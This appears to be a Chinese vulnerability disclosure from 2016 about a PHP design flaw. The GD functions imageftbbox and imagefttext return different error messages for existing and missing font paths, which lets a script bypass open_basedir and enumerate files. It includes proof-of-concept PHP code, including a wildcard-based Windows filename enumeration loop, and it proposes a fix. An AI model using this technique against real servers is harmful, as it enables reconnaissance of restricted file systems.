PHITHON的公开漏洞php设计缺陷导致绕过open_basedir列举目录#3 2016-09-06

php设计缺陷导致绕过open_basedir列举目录#3

@/fd 曾在这篇帖子里 http://zone.wooyun.org/content/11268 给出了一些绕过open_basedir的方法。方法总体来说有一些鸡肋性,看客官如何理解了。

根据PHP的尿性,这个洞肯定忽略了,之后我也会整理一些类似的方法,公布出来。

@/fd的代码里对于列目录有两个方法,一是利用DirectoryIterator类,二是利用realpath函数。前者很好用,我就不多说了。单说下后者,realpath函数在处理已存在的文件(目录)与不存在的文件(目录)时情况不同,如果文件已存在则会抛出错误open_basedir restriction in effect. File(xxxxx) is not within the allowed path(s),如果文件不存在则会返回false。

所以我们可以通过捕捉错误handle,来判断某文件是否存在。

我的第三个方法也类似。

php的gd2库有一个函数叫imageftbbox:

GD库基本上是php必备库,所以也不存在鸡肋不鸡肋的说法。这个函数第三个参数是字体的路径。我发现当这个参数在open_basedir外的时候,当文件存在,则php会抛出File(xxxxx) is not within the allowed path(s)错误。但当文件不存在的时候会抛出Invalid font filename错误。

测试代码:

1
2
3
4
<?php
printf("<b>open_basedir: %s</b><br />", ini_get('open_basedir'));
imageftbbox(100, 100, $_GET['file'], 'aaa');
?>

结果:

002.jpg

003.jpg

所以,我们可以根据php抛出错误的不同来判断某个文件是否存在,进而进行目录的枚举。
在php的GD中,还有个类似的函数(也是需要加载字体的函数)存在同样的问题,是imagefttext。我就一起提交了。

在windows下,我们可以通过windows特性,也就是“通配符”来快速枚举目录,不需要暴力跑目录了。

详细代码见#1,这里情况有些不同,所以我再说一遍。

例如d:/test/下有如下文件:

004.jpg

我写了个简单的,但只能枚举文件第一个字符的代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
<?php
printf("<b>open_basedir: %s</b><br />", ini_get('open_basedir'));
set_error_handler('isexists');
$dir = 'd:/test/';
$file = '';
$chars = 'abcdefghijklmnopqrstuvwxyz0123456789_';
for ($i=0; $i < strlen($chars); $i++) { 
    $file = $dir . $chars[$i] . '<><';
    //$m = imagecreatefrompng("zip.png");
    //imagefttext($m, 100, 0, 10, 20, 0xffffff, $file, 'aaa');
    imageftbbox(100, 100, $file, 'aaa');
}

function isexists($errno, $errstr)
{
    global $file;
    if (stripos($errstr, 'Invalid font filename') === FALSE) {
        printf("%s<br/>", $file);
    }
}
?>

输出如下:

005.jpg

可见已列出第一个字符了。顺势我们就可以逐一列出后面的每个字符,造成目录的枚举,我就不具体给代码了,大家自己发挥自己的想象。

只要在open_basedir外,不管文件是否存在,都应该抛出相同错误。